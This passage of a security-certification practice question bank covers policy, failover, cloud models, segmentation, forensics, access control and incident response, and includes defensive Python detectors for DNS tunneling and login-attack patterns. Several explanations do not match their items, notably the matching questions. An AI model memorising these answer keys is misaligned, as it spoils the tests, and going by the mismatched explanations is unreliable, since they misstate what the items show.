This is correct because a standard turns policy into measurable, mandatory requirements. Exact settings such as encryption, screen-lock timing, and administrative restrictions belong in a standard since they must be applied consistently across similar systems. Standards help administrators implement security in a uniform, auditable way.

Why this answer

Option B is correct because a standard defines mandatory, specific technical configurations that must be uniformly applied across all company laptops. The question lists concrete settings (full-disk encryption, 10-minute screen-lock timeout, removal of local admin rights) that are not open to interpretation, which aligns precisely with the role of a security standard in enforcing baseline compliance.

Exam trap

The trap here is that candidates confuse 'policy' (high-level direction) with 'standard' (specific mandatory configuration), leading them to pick A when the question explicitly lists concrete, enforceable settings rather than general principles.

How to eliminate wrong answers

Option A is wrong because a policy states high-level intentions and management direction (e.g., 'laptops must be secured'), but does not include the exact technical settings like '10-minute screen-lock timeout' or 'full-disk encryption'. Option C is wrong because a procedure describes step-by-step actions an end user or administrator must perform (e.g., 'how to enable BitLocker'), not the mandatory configuration values themselves. Option D is wrong because a guideline offers flexible, non-mandatory recommendations (e.g., 'consider using full-disk encryption'), whereas the question explicitly requires mandatory settings that must be followed.

265
MCQ · medium

A customer portal runs on a single application server behind a database cluster. Leadership wants the portal to keep working if that application server fails, but the budget is tight and the team wants the simplest design that can automatically fail over. What should they add?

A. A second application server configured as an active-passive failover pair with health checks.
B. A cold backup server that is started manually after the outage is detected.
C. A multi-region active-active deployment with global traffic steering.
D. Additional RAID storage in the application server to prevent service interruption.
Answer: A

An active-passive pair provides automatic failover for a single server failure without the cost and complexity of a larger multi-node design. Health checks let the standby take over when the primary becomes unavailable, which matches the stated availability goal and budget constraint.

Why this answer

Option A is correct because an active-passive failover pair with health checks provides automatic failover at the lowest complexity and cost. The passive server remains on standby, and health checks (e.g., ICMP, TCP port checks, or HTTP GET requests) detect application server failure, triggering automatic IP or service takeover. This meets the requirement for automatic failover without the expense and complexity of active-active or multi-region designs.

Exam trap

The trap here is that candidates often confuse high availability with disaster recovery, assuming that a cold backup or RAID storage provides automatic failover, when in fact only a hot standby with health checks meets the automatic requirement without over-engineering the solution.

How to eliminate wrong answers

Option B is wrong because a cold backup server that is started manually does not provide automatic failover; it requires human intervention, which violates the requirement for automatic failover. Option C is wrong because a multi-region active-active deployment with global traffic steering is far more complex and expensive than needed for a single application server failure; it introduces DNS-level steering, cross-region replication, and higher operational overhead. Option D is wrong because additional RAID storage only protects against disk failure within the server, not against the entire application server failing; it does not provide any server-level redundancy or failover capability.

266
MCQ · medium

Based on the exhibit, which cloud service model best fits the application's operational and security requirements?

A. Infrastructure as a Service (IaaS), because it gives full control over the guest operating system.
B. Platform as a Service (PaaS), because it offloads OS and runtime maintenance while preserving application control.
C. Software as a Service (SaaS), because the organization would not need to maintain anything.
D. Colocation, because the team can place its own servers in a provider facility and manage everything directly.
Answer: B

PaaS fits the requirements because the provider manages the underlying platform, including OS patching, runtime maintenance, and scaling features. The development team can still deploy code and manage the application layer and data model, which matches the scenario. This is a strong secure-service-selection choice when the goal is to reduce patching burden without giving up application control.

Why this answer

The exhibit shows an application that requires the organization to manage the application code and data while offloading the underlying OS, runtime, and middleware maintenance. Platform as a Service (PaaS) provides this exact split: the cloud provider handles the OS patches, runtime updates, and infrastructure scaling, while the organization retains full control over the application deployment and configuration. This matches the requirement of preserving application control without the overhead of managing the guest OS.

Exam trap

The trap here is that candidates see 'full control' in option A and assume it is always better for security, but the question's requirement to offload OS maintenance makes PaaS the correct choice—IaaS would actually increase the security burden by requiring the organization to manage guest OS hardening and patching.

How to eliminate wrong answers

Option A is wrong because IaaS gives full control over the guest OS, but the requirement specifically states the organization does not want to manage the OS or runtime—IaaS would force them to handle patching, hardening, and maintenance of the OS, which contradicts the operational need. Option C is wrong because SaaS would offload everything, including application control, but the requirement explicitly says the organization must preserve control over the application code and data—SaaS removes that control entirely. Option D is wrong because colocation requires the organization to manage all hardware, OS, and software layers themselves, which is the opposite of offloading OS and runtime maintenance; it also introduces physical security and hardware lifecycle burdens not aligned with the stated requirements.

267
Multi-Select · easy

A company is building a public web app with three tiers. Internet users should reach only the web tier, and the app tier should never be reachable from the internet. Which two network design choices support this goal? Select two.

Select 2 answers
A. Place the web server in a DMZ or public-facing zone.
B. Allow inbound traffic from the internet directly to the application servers.
C. Restrict the application tier so only the web tier can initiate connections to it.
D. Put the database on the guest Wi-Fi VLAN.
E. Use the same flat network for all three tiers.
Answers: A, C

A DMZ is the standard place for internet-facing services because it creates a controlled boundary between public traffic and internal systems. It lets the web tier accept external requests without exposing deeper resources.

Why this answer

Option A is correct because placing the web server in a DMZ (demilitarized zone) or public-facing zone allows internet traffic to reach only the web tier while isolating the internal network. This is a standard security architecture where the DMZ acts as a buffer, and firewall rules permit inbound HTTP/HTTPS (ports 80/443) only to the web servers, not to the application or database tiers.

Exam trap

The trap here is that candidates may think placing the app tier behind a firewall alone is sufficient, but they must also explicitly restrict inbound connections to only the web tier, not just block the internet—otherwise internal lateral movement or misconfigured rules could still expose the app tier.

268
Multi-Select · medium

A firewall rule was added directly in production to allow a new vendor IP range, and an internal service stopped responding because the new rule was placed above an existing deny rule. Which two change-management practices would have reduced the risk? Select two.

Select 2 answers
A. Test the rule in a staging environment that mirrors production
B. Require peer review and approval with a documented rollback plan
C. Apply the change during peak business hours to notice problems quickly
D. Disable firewall logging during the change to reduce noise
E. Skip documentation because the rule only affects one vendor
Answers: A, B

Testing in a realistic environment helps catch rule-order and access-side effects before production deployment.

Why this answer

Option A is correct because testing the rule in a staging environment that mirrors production allows you to verify the rule's behavior—specifically its placement relative to existing deny rules—without risking service disruption. In a firewall rulebase, rules are processed top-down, and a new permit rule placed above a deny rule can inadvertently match and permit traffic that was previously denied, or conversely, block traffic if the rule is misordered. Staging testing would have revealed that the new rule's position caused the internal service to stop responding, enabling adjustment before production deployment.

Exam trap

The trap here is that candidates often focus only on testing the rule's content (e.g., IP addresses and ports) and overlook the critical importance of rule order and placement in a sequential firewall rulebase, leading them to choose options like disabling logging or skipping documentation instead of recognizing that peer review and staging testing directly address ordering risks.

269
MCQ · hard

Based on the exhibit, which temporary control best reduces risk until the patch is released?

A. Increase scan frequency to daily and leave the service exposed.
B. Place the service behind a reverse proxy or WAF and restrict access with source IP allow lists.
C. Disable TLS so the traffic can be inspected more easily.
D. Move administrative access to the same 443 listener as user traffic.
Answer: B

The service must stay online, but the patch is unavailable, so the best temporary measure is to reduce exposure. A reverse proxy or WAF can filter malicious requests, and source IP allow lists shrink the reachable attack surface. Together, those controls act as an effective compensating measure until the vendor fix is released and can be applied.

Why this answer

Option B is correct because placing the service behind a reverse proxy or Web Application Firewall (WAF) with source IP allow lists provides a temporary compensating control that reduces the attack surface until the vendor releases a patch. The reverse proxy or WAF can inspect and filter malicious traffic, while IP allow lists restrict access to trusted sources only, mitigating the risk of exploitation without removing the service entirely.

Exam trap

CompTIA often tests the misconception that increasing monitoring (scan frequency) is a sufficient compensating control, when in fact it does not prevent exploitation—only detection is improved.

How to eliminate wrong answers

Option A is wrong because increasing scan frequency does not reduce risk; it only detects potential issues sooner, leaving the vulnerable service exposed to active exploitation. Option C is wrong because disabling TLS removes encryption, exposing all traffic to interception and tampering, which violates confidentiality and integrity, and does not address the underlying vulnerability. Option D is wrong because moving administrative access to the same 443 listener as user traffic increases the attack surface by merging management and user channels, making it easier for an attacker to target administrative functions.

270
MCQ · medium

An investigator receives a suspect laptop drive that may be used in court. Which approach best supports a forensically sound image while protecting the original media?

A. Mount the drive read-write so the investigator can browse it quickly.
B. Use a hardware write blocker and create a bit-by-bit forensic image with hashes.
C. Copy only the user profile folders with a file manager to save time.
D. Boot the laptop normally and use backup software to duplicate the disk.
Answer: B

This is the best practice because a hardware write blocker prevents any accidental writes to the source drive, and a bit-by-bit image captures the exact data structure for analysis. Hashing the source or image before and after acquisition provides integrity verification, which is essential when evidence may be challenged later. Together, these steps protect the original media and support chain of custody and courtroom admissibility.

Why this answer

Option B is correct because forensic best practice requires preserving the original media in an unaltered state. A hardware write blocker physically prevents any write commands from reaching the drive, ensuring the original evidence is not modified. Creating a bit-by-bit forensic image (e.g., with `dd` or FTK Imager) captures the entire drive, including slack space and unallocated sectors, and generating cryptographic hashes (SHA-256 or MD5) before and after imaging verifies the image's integrity for court admissibility.

Exam trap

The trap here is that candidates may think booting the laptop or using a file manager is acceptable for a quick preview, but any write access—even seemingly harmless metadata updates—renders the evidence inadmissible under Daubert or Frye standards.

How to eliminate wrong answers

Option A is wrong because mounting the drive read-write allows the operating system to write metadata (e.g., timestamps, directory entries) to the drive, altering the original evidence and breaking the chain of custody. Option C is wrong because copying only user profile folders with a file manager omits critical data such as deleted files, file system metadata, and unallocated space, which may contain evidence; it also modifies file access times. Option D is wrong because booting the laptop normally writes temporary files, logs, and registry changes to the drive, and backup software typically does not create a bit-for-bit copy, altering the original media and compromising forensic soundness.

271
Multi-Select · easy

A network analyst reviews packet captures from a subnet where users intermittently lose access to the gateway. Which two findings would most strongly indicate ARP spoofing? Select two.

Select 2 answers
A. Repeated unsolicited ARP replies map the gateway IP to a different MAC address.
B. Several hosts suddenly send gateway traffic to the same unexpected MAC address.
C. Extra DNS traffic appears during the lunch hour.
D. A switch port negotiates a slower speed than usual.
E. The wireless network name appears in a site survey.
Answers: A, B

Repeated unsolicited ARP replies are a classic sign of spoofing on a LAN.

Why this answer

ARP spoofing involves an attacker sending forged ARP replies to associate the gateway's IP address with the attacker's MAC address. Repeated unsolicited ARP replies mapping the gateway IP to a different MAC address is a classic indicator, as legitimate ARP replies are normally solicited by requests. This causes traffic intended for the gateway to be redirected to the attacker, enabling interception or disruption.

Exam trap

CompTIA often tests the distinction between ARP spoofing (unsolicited ARP replies) and ARP cache poisoning (where the attacker responds faster than the legitimate host), and candidates may confuse extra DNS traffic or physical issues with ARP-based attacks.

272
MCQ · hard

Based on the exhibit, what is the BEST fix for the vulnerability being exploited?

Exhibit: A user with a standard account can retrieve documents by changing the `docId` value in the request. The application returns another employee's file without any authorization error.

A. Add client-side JavaScript to hide document IDs from the user interface.
B. Enforce server-side object-level authorization checks before returning any document.
C. Require users to change passwords more frequently to prevent unauthorized document access.
D. Place the document server behind a load balancer to prevent direct access to the application.
Answer: B

The application is returning objects to an authenticated user without verifying whether that user is allowed to access each specific record.

Why this answer

The vulnerability is an Insecure Direct Object Reference (IDOR), where the application trusts user-supplied input (the `docId` parameter) without verifying that the authenticated user is authorized to access the requested document. The best fix is to enforce server-side object-level authorization checks before returning any document, ensuring that the server validates the user's permissions against the specific resource ID before processing the request.

Exam trap

The trap here is that candidates may confuse client-side hiding (option A) with a valid security control, but the SY0-701 exam emphasizes that all access control must be enforced server-side, as client-side controls are trivially bypassed.

How to eliminate wrong answers

Option A is wrong because client-side JavaScript hiding of document IDs is security by obscurity and can be easily bypassed by inspecting network traffic or modifying requests with tools like Burp Suite; it does not prevent direct manipulation of the `docId` parameter. Option C is wrong because requiring more frequent password changes addresses credential management, not authorization flaws; it does not prevent an authenticated user from accessing unauthorized documents via IDOR. Option D is wrong because placing the document server behind a load balancer only distributes traffic and does not enforce any authorization checks; it does not mitigate the underlying issue of missing access controls on individual objects.

273
Matching · easy

Match each cloud security concept to the best description.


Concepts
Matches

Defines which security tasks belong to the cloud provider and which remain with the customer

Separates one customer's cloud resources from another customer's resources

Uses the provider's logging service to record workload and control-plane activity

Places workload resources where they are not directly exposed to the internet

Why these pairings

Each cloud security concept is matched to its primary function: encryption protects data at rest or in transit, IAM manages access, SIEM provides event analysis, IDS detects intrusions, and DLP prevents data loss.

274
MCQ · medium

A security analyst at a financial firm notices a significant increase in DNS queries from an internal server to a rarely visited external domain. The queries are for unusual subdomain names that contain encoded data. The server is not a DNS server and does not typically generate outbound traffic. Which of the following is the MOST appropriate immediate action for the analyst to take?

A. Block all outbound DNS traffic from the server immediately.
B. Isolate the server from the network to prevent further data loss.
C. Create a firewall rule to log all further DNS queries from the server.
D. Run an antivirus scan on the server.
Answer: B

Isolation effectively stops the ongoing DNS tunneling by severing the server’s network connectivity. This contains the incident, prevents additional data exfiltration, and provides a controlled environment for further forensic analysis. It aligns with standard incident response procedures.

Why this answer

The server is exhibiting signs of a DNS data exfiltration attack, where encoded data is being tunneled through DNS queries to an external domain. Isolating the server immediately stops the data loss and prevents further compromise, which is the most critical first step in incident response. Blocking traffic or scanning alone would not halt the active exfiltration, and logging without action allows continued data theft.

Exam trap

The trap here is that candidates choose to log or scan first, mistaking detection for containment, but the SY0-701 exam emphasizes immediate isolation to stop data loss in active exfiltration scenarios.

How to eliminate wrong answers

Option A is wrong because blocking all outbound DNS traffic from the server could disrupt legitimate services and does not address the root cause; the attacker may switch to another protocol. Option C is wrong because creating a firewall rule to log further queries only monitors the ongoing exfiltration without stopping it, violating the principle of immediate containment. Option D is wrong because running an antivirus scan is a secondary step that assumes a known malware signature, whereas DNS exfiltration often uses custom scripts or living-off-the-land binaries that may evade signature-based detection.
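The indicator in this item (a non-DNS host sending bursts of queries whose leftmost labels carry encoded data) is something a SIEM rule or a small script can surface before an analyst ever sees the traffic. The following Python script is an added example and not part of the question bank; the log line format, the source addresses, the `c2.example.net` parent domain and the thresholds are all constructed for illustration. It scores each query's first label by length and Shannon entropy and flags a source host once enough encoded-looking names go to the same parent domain:

```python
"""Flag hosts whose DNS queries look like data tunneling.

Added example, not part of the question bank. The log format and every
value below are constructed for illustration; tune the thresholds to the
query volume and naming conventions of your own environment.
"""
import math
import re
from collections import Counter, defaultdict

# Constructed log format: "<timestamp> <source_ip> <query_name>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<qname>\S+)$")

# Constructed sample: 10.0.5.23 browses normally; 10.0.5.40 sends long
# hex-looking labels under one parent domain, the tunneling pattern.
SAMPLE_LOG = """\
2024-05-01T02:10:01 10.0.5.23 www.example.com
2024-05-01T02:10:03 10.0.5.23 mail.example.com
2024-05-01T02:11:00 10.0.5.40 4d7a6b5a3c2b1a9f8e7d.c2.example.net
2024-05-01T02:11:01 10.0.5.40 9f8e7d6c5b4a3f2e1d0c.c2.example.net
2024-05-01T02:11:02 10.0.5.40 a1b2c3d4e5f6a7b8c9d0.c2.example.net
2024-05-01T02:11:03 10.0.5.40 0f1e2d3c4b5a69788796.c2.example.net
2024-05-01T02:11:04 10.0.5.40 ff00aa11bb22cc33dd44.c2.example.net
"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; encoded or encrypted labels score high."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def label_looks_encoded(label: str, min_len: int = 16, min_entropy: float = 3.0) -> bool:
    """Long, high-entropy leftmost labels are the signature of data smuggled in query names."""
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy


def parse_line(line: str):
    """Return (source_ip, normalised query name) or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return m.group("src"), m.group("qname").rstrip(".").lower()


def analyze(log_text: str, min_hits: int = 5) -> dict:
    """Map each suspicious source IP to the parent domain receiving its encoded queries."""
    hits = defaultdict(Counter)  # src -> parent domain -> encoded-looking query count
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, qname = parsed
        first_label, _, parent = qname.partition(".")
        if parent and label_looks_encoded(first_label):
            hits[src][parent] += 1
    flagged = {}
    for src, domains in hits.items():
        parent, count = domains.most_common(1)[0]
        if count >= min_hits:
            flagged[src] = {"domain": parent, "encoded_queries": count}
    return flagged


if __name__ == "__main__":
    for src, info in analyze(SAMPLE_LOG).items():
        print(f"{src}: {info['encoded_queries']} encoded-looking queries to {info['domain']}")
```

The entropy threshold is deliberately conservative: a 20-character hexadecimal label scores well above 3 bits per character, while ordinary hostnames such as `www` or `mail` fail the length test before entropy is even computed. In production the flagged host would feed the isolation step this item describes, and the rule should be paired with a baseline of known CDN or anti-virus domains that legitimately use long labels.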

275
Multi-Select (easy)

Before approving a new payroll SaaS provider, the security team wants independent evidence that the vendor's controls operated effectively during the last year and wants the contract to clearly define security responsibilities. Which two items should they request or review? Select two.

Select 2 answers
A.A SOC 2 Type II report
B.A sales presentation from the vendor account team
C.The vendor's public blog posts
D.Contract clauses covering security responsibilities and incident notification
E.A screenshot of the login page
AnswersA, D

A SOC 2 Type II report provides independent evidence that controls operated effectively over a period of time.

Why this answer

A SOC 2 Type II report provides independent, audited evidence that a vendor's controls (e.g., security, availability, confidentiality) were operating effectively over a specified period (typically 6–12 months). This directly meets the requirement for independent evidence of control effectiveness over the last year, unlike a point-in-time assessment.

Exam trap

The trap here is that candidates often confuse a SOC 2 Type I report (point-in-time design review) with a Type II report (operational effectiveness over time), or they mistakenly believe that marketing materials or user interface screenshots can substitute for independent audit evidence.

276
Multi-Select (hard)

A Linux operations team must run a nightly maintenance script on 70 servers to rotate logs and restart one service. Security will not allow interactive SSH logins, and the script should only have the permissions required for those two commands. Which two configuration choices best meet the requirement? Select two.

Select 2 answers
A.Create a dedicated automation account and restrict it in sudoers to the exact commands needed.
B.Place the automation account in the root group so it can restart services everywhere.
C.Use SSH key authentication with a restricted shell or forced command for the automation account.
D.Copy the administrator's personal password into the script so the job can log in unattended.
E.Approve the job through email one time, then allow the script to run with no restrictions forever.
AnswersA, C

A dedicated account makes auditing clear, and sudoers restrictions enforce least privilege for only the approved commands.

Why this answer

Option A is correct because creating a dedicated automation account and restricting it in sudoers to the exact commands needed (e.g., `/usr/sbin/logrotate` and `/usr/bin/systemctl restart <service>`) enforces the principle of least privilege. This ensures the account can only execute the specific maintenance tasks without granting interactive SSH access or unnecessary permissions.

Exam trap

The trap here is that candidates often assume placing an account in a privileged group (like root) is acceptable for automation, but CompTIA tests the principle of least privilege, requiring exact command restriction rather than broad group membership.

277
MCQ (easy)

Employees use one corporate login to sign in to email, the ticketing portal, and the HR application. After signing in once, the other apps accept the same identity without separate passwords. What capability is this?

A.Single sign-on (SSO)
B.Federation
C.Multi-factor authentication (MFA)
D.Session timeout
AnswerA

SSO lets users authenticate once and access multiple connected applications without repeated logins.

Why this answer

Single sign-on (SSO) allows a user to authenticate once and gain access to multiple applications without re-entering credentials. In this scenario, the corporate login provides a token (e.g., Kerberos ticket or SAML assertion) that is accepted by the email, ticketing portal, and HR application, eliminating the need for separate passwords. This is the core capability of SSO.

Exam trap

CompTIA often tests the distinction between SSO and federation, where candidates mistakenly choose federation because they think 'multiple apps' implies different domains, but the key is that federation involves separate organizations, not just separate applications within the same organization.

How to eliminate wrong answers

Option B (Federation) is wrong because federation extends SSO across different organizations or domains, establishing trust relationships between separate identity providers, whereas the question describes a single corporate login within one organization. Option C (Multi-factor authentication) is wrong because MFA requires two or more verification factors (e.g., password + token), not the ability to reuse a single authentication across multiple apps. Option D (Session timeout) is wrong because session timeout is a security control that automatically ends a user's session after a period of inactivity, not a mechanism for sharing authentication across applications.

278
MCQ (medium)

A security analyst reviews authentication logs and notices multiple failed login attempts using various usernames from a single IP address over several hours. Eventually, a successful login occurs using a username that had many failed attempts. The organization requires multi-factor authentication (MFA). Which type of attack is most likely indicated by this pattern?

A.Credential stuffing
B.Brute-force attack
C.Password spraying
D.Shoulder surfing
AnswerA

Credential stuffing leverages lists of known username/password pairs from previous breaches. The analyst observed many failed attempts from one source IP, then a successful login, which matches an attacker testing stolen credentials. Even with MFA, the attack may succeed if the attacker has obtained session tokens or uses other techniques.

Why this answer

The pattern of multiple failed login attempts using various usernames from a single IP address, followed by a successful login for a username that had many failed attempts, is characteristic of a credential stuffing attack. In this attack, the adversary uses a list of previously compromised username/password pairs (often obtained from data breaches) and attempts them against the target system. The successful login indicates that the attacker found a valid credential pair, which bypasses the MFA requirement only if the attacker also has access to the second factor (e.g., via a phishing or session hijacking attack), but the log pattern itself points to credential stuffing.

Exam trap

The trap here is confusing credential stuffing with password spraying: candidates often pick password spraying because it also uses multiple usernames, but the key differentiator is that credential stuffing uses many attempts per username (as seen in the logs), while password spraying uses one common password per username with long delays between attempts.

How to eliminate wrong answers

Option B (Brute-force attack) is wrong because a brute-force attack typically targets a single username with many password guesses, not multiple usernames from a single IP. Option C (Password spraying) is wrong because password spraying uses a single common password against many usernames, not multiple failed attempts per username followed by a success; the pattern here shows many attempts per username, which is the opposite of spraying's low-and-slow approach.
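The distinctions this item draws (many attempts per username versus one attempt per username versus one username hammered repeatedly, plus a success following earlier failures from the same source) can be encoded as a triage rule over authentication logs. The following Python script is an added example and not part of the question bank; its log format, source addresses and thresholds are constructed, and its "credential stuffing" branch follows the framing this item uses. The brute-force branch is not exercised by the sample data but shows how the same per-source summary covers that case too:

```python
"""Classify a burst of failed logins per source IP.

Added example, not part of the question bank. The log format, the source
addresses and the thresholds below are constructed for illustration; tune
them to your own authentication volume before alerting on them.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+user=(?P<user>\S+)\s+result=(?P<result>SUCCESS|FAIL)$"
)

# Constructed sample: one host cycles through several usernames with several
# tries each and finally gets in; a second host tries each user exactly once.
SAMPLE_LOG = """\
2024-05-01T01:00:01 src=198.51.100.9 user=alice result=FAIL
2024-05-01T01:00:04 src=198.51.100.9 user=alice result=FAIL
2024-05-01T01:00:07 src=198.51.100.9 user=alice result=FAIL
2024-05-01T01:00:10 src=198.51.100.9 user=bob result=FAIL
2024-05-01T01:00:13 src=198.51.100.9 user=bob result=FAIL
2024-05-01T01:00:16 src=198.51.100.9 user=bob result=FAIL
2024-05-01T01:00:19 src=198.51.100.9 user=bob result=FAIL
2024-05-01T01:00:22 src=198.51.100.9 user=carol result=FAIL
2024-05-01T01:00:25 src=198.51.100.9 user=carol result=FAIL
2024-05-01T01:00:28 src=198.51.100.9 user=carol result=SUCCESS
2024-05-01T03:00:00 src=203.0.113.5 user=alice result=FAIL
2024-05-01T03:30:00 src=203.0.113.5 user=bob result=FAIL
2024-05-01T04:00:00 src=203.0.113.5 user=carol result=FAIL
2024-05-01T04:30:00 src=203.0.113.5 user=dave result=FAIL
"""


def summarize(log_text: str):
    """Per source IP: failed attempts per user, and users that succeeded after earlier failures."""
    failures = defaultdict(lambda: defaultdict(int))  # src -> user -> failed count
    compromised = defaultdict(list)                    # src -> users with fail-then-success
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        src, user, result = m.group("src"), m.group("user"), m.group("result")
        if result == "FAIL":
            failures[src][user] += 1
        elif failures[src].get(user) and user not in compromised[src]:
            compromised[src].append(user)  # success only after prior failures from this source
    return failures, compromised


def classify(log_text: str, many_users: int = 3, min_failures: int = 5, tries_per_user: int = 2) -> dict:
    """Map each source IP to the attack pattern its failure distribution suggests."""
    failures, compromised = summarize(log_text)
    verdicts = {}
    for src, per_user in failures.items():
        if not per_user:
            continue  # source seen only with successes, nothing to classify
        total = sum(per_user.values())
        users = len(per_user)
        avg = total / users
        if users == 1 and total >= min_failures:
            pattern = "brute force"          # one account, many guesses
        elif users >= many_users and avg >= tries_per_user:
            pattern = "credential stuffing"  # many users, several tries each (this item's framing)
        elif users >= many_users:
            pattern = "password spraying"    # many users, one guess each, low and slow
        else:
            pattern = "inconclusive"
        verdicts[src] = {
            "pattern": pattern,
            "distinct_users": users,
            "failed_attempts": total,
            "success_after_failures": sorted(compromised.get(src, [])),
        }
    return verdicts


if __name__ == "__main__":
    for src, verdict in classify(SAMPLE_LOG).items():
        print(src, verdict)
```

The `success_after_failures` list is the field an analyst acts on: a username that appears there from an external source is the account to contain (session revocation and password reset, as later items on this page describe), while the `pattern` label mainly decides whether the response also needs rate limiting or a source-IP block.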

279
Matching (easy)

Match each network segment to the best use in a small enterprise.

Matches

Network segment for internet-facing services such as a public web proxy or reverse proxy

Segment for internal systems such as databases that should not be directly reachable from the internet

Restricted network used for switch, firewall, and server administration traffic

Internet-only network for visitors and unmanaged devices

Why these pairings

Each segment serves a specific purpose: guest Wi-Fi for external users, DMZ for public services, internal LAN for daily operations, management for device control, data center for core infrastructure, VPN for secure remote access.

280
MCQ (medium)

A system administrator must run a weekly maintenance script that stops and restarts two services on 50 Linux servers. Security says the job must not use an interactive login and should have only the permissions needed for that task. What is the best approach?

A.Use the root account for the scheduled job so it always succeeds.
B.Create a dedicated account with sudo rights limited to the required service commands.
C.Ask an administrator to log in manually each week and run the script.
D.Store the administrator password in the script so the task can authenticate automatically.
AnswerB

A restricted service account with narrowly scoped sudo permissions supports automation while limiting exposure if the job is abused.

Why this answer

Option B is correct because it follows the principle of least privilege by creating a dedicated service account with sudo rights restricted to only the specific service management commands (e.g., `systemctl restart serviceA.service && systemctl restart serviceB.service`). This avoids using the root account (which has unrestricted access) and eliminates the need for interactive logins or embedded credentials, while still allowing the scheduled job (e.g., via cron) to run non-interactively.

Exam trap

The trap here is that candidates may assume root is necessary for service management on Linux, but sudo with carefully scoped commands provides the same functionality without granting full root privileges.

How to eliminate wrong answers

Option A is wrong because using the root account for a scheduled job violates the principle of least privilege and unnecessarily exposes the entire system to potential compromise if the script is tampered with. Option C is wrong because requiring manual interactive login each week defeats automation, introduces human error risk, and does not scale to 50 servers. Option D is wrong because storing the administrator password in the script is a severe security risk (credential exposure) and violates the requirement to avoid interactive login, as the password would be visible in plaintext or easily reversible.

281
MCQ (medium)

An administrator pushed a firewall rule change to allow a new vendor IP range during business hours. Minutes later, payroll users lost access to an internal service. Which change management practice would have best reduced the impact?

A.Apply changes directly in production so they take effect as quickly as possible.
B.Test the change in a staging environment and include a rollback plan in the request.
C.Avoid documenting the change until after the maintenance window ends.
D.Use verbal approval from the payroll manager instead of the normal ticket process.
AnswerB

This is the best practice because staging validation can reveal unintended access impacts before production is touched. A rollback plan gives operators a fast, documented way to restore service if the change breaks something critical. Together, testing and rollback planning reduce outage duration and support safer operational hardening by making the change controlled, reviewable, and reversible.

Why this answer

Option B is correct because testing the change in a staging environment first would have revealed any unintended side effects, such as ACL conflicts that blocked payroll traffic. Including a rollback plan ensures that if the change causes issues in production, the administrator can quickly revert the firewall rule to restore service. This aligns with the change management process of minimizing impact through controlled testing and contingency planning.

Exam trap

The trap here is that candidates may think speed of implementation (Option A) is more important than safety, but CompTIA emphasizes that change management processes, including testing and rollback, are critical to prevent production outages.

How to eliminate wrong answers

Option A is wrong because applying changes directly in production without prior testing increases the risk of disrupting services, as seen when the new vendor IP range inadvertently blocked payroll users. Option C is wrong because avoiding documentation until after the maintenance window violates change management best practices and makes it difficult to identify or revert the change when an incident occurs. Option D is wrong because using verbal approval bypasses the formal change control process, leaving no audit trail and increasing the chance of unauthorized or uncoordinated changes that can cause outages.

282
MCQ (medium)

A public web application is seeing bursts of requests that contain SQL metacharacters, encoded script tags, and attempts to POST to administrative endpoints. The team wants a control that can inspect HTTP traffic and block the malicious requests before they reach the app. What should be deployed?

A.A web application firewall in front of the application
B.An endpoint detection and response agent on the web server only
C.A data loss prevention rule on the email gateway
D.A network access control system for user authentication
AnswerA

A WAF is designed to inspect HTTP/S traffic and block common web attacks such as SQL injection and cross-site scripting before they reach the application.

Why this answer

A web application firewall (WAF) is specifically designed to inspect HTTP/HTTPS traffic at the application layer (Layer 7), analyzing request payloads for SQL metacharacters, encoded script tags (XSS), and unauthorized POST attempts to administrative endpoints. By deploying a WAF in front of the web application, malicious traffic is filtered and blocked before it reaches the application server, providing a proactive security control against common web attacks such as SQL injection and cross-site scripting.

Exam trap

The trap here is that candidates may confuse a WAF with a network firewall or an IDS/IPS, but the question specifically mentions HTTP traffic inspection and blocking of application-layer attacks (SQLi, XSS), which is the precise domain of a WAF, not a general network firewall or host-based EDR.

How to eliminate wrong answers

Option B is wrong because an endpoint detection and response (EDR) agent on the web server only monitors and responds to threats at the host level (e.g., file changes, process anomalies) after traffic has already reached the server; it does not inspect or block incoming HTTP requests at the network perimeter. Option C is wrong because a data loss prevention (DLP) rule on the email gateway is designed to monitor and prevent the unauthorized transmission of sensitive data via email, not to inspect or block HTTP traffic targeting a web application.

283
MCQ (medium)

A help desk ticket reports that a user's Microsoft 365 mailbox sent hundreds of messages to external contacts, and the user says they are still receiving MFA prompts they did not start. The attacker may still have an active web session. What is the best first containment action?

A.Delete the suspicious sent messages and close the ticket.
B.Revoke the account's active sessions and reset the password immediately.
C.Wait until the end of the workday to avoid interrupting the user.
D.Reimage the user's laptop before touching the email account.
AnswerB

Ending active sessions cuts off any stolen cookies or tokens that may still be valid, and resetting the password prevents immediate reentry. In an email compromise, the attacker often keeps access through browser sessions even after credentials change. Fast containment should focus on terminating current access paths first, then investigating forwarding rules, OAuth grants, and sign-in history.

Why this answer

Option B is correct because the user is still receiving unsolicited MFA prompts, indicating an attacker likely has an active web session with a valid token. Revoking all active sessions immediately invalidates any existing tokens or cookies, while resetting the password ensures the attacker cannot re-authenticate. This is the fastest way to cut off the attacker's access and stop further abuse of the mailbox.

Exam trap

The trap here is that candidates may think deleting the sent messages is sufficient containment, failing to recognize that the attacker's active session must be terminated to stop ongoing compromise.

How to eliminate wrong answers

Option A is wrong because deleting the suspicious messages does not remove the attacker's access; they can continue sending more emails, and the root cause (compromised session) remains unaddressed. Option C is wrong because waiting until the end of the workday gives the attacker more time to exfiltrate data, send additional malicious emails, or escalate privileges, violating the principle of immediate containment.

284
Multi-Select (easy)

A branch office has users, finance workstations, and printers on the same LAN. Management wants finance devices isolated from general users while still allowing approved printing and internet access. Which two changes best meet this goal? Select two.

Select 2 answers
A.Put finance systems in a separate VLAN.
B.Use firewall or ACL rules between the VLANs.
C.Remove the default gateway from all finance devices.
D.Place all systems in one flat subnet.
E.Use hubs instead of switches to simplify traffic flow.
AnswersA, B

A separate VLAN creates logical separation between finance devices and general users. This reduces lateral movement and makes it easier to apply different security rules.

Why this answer

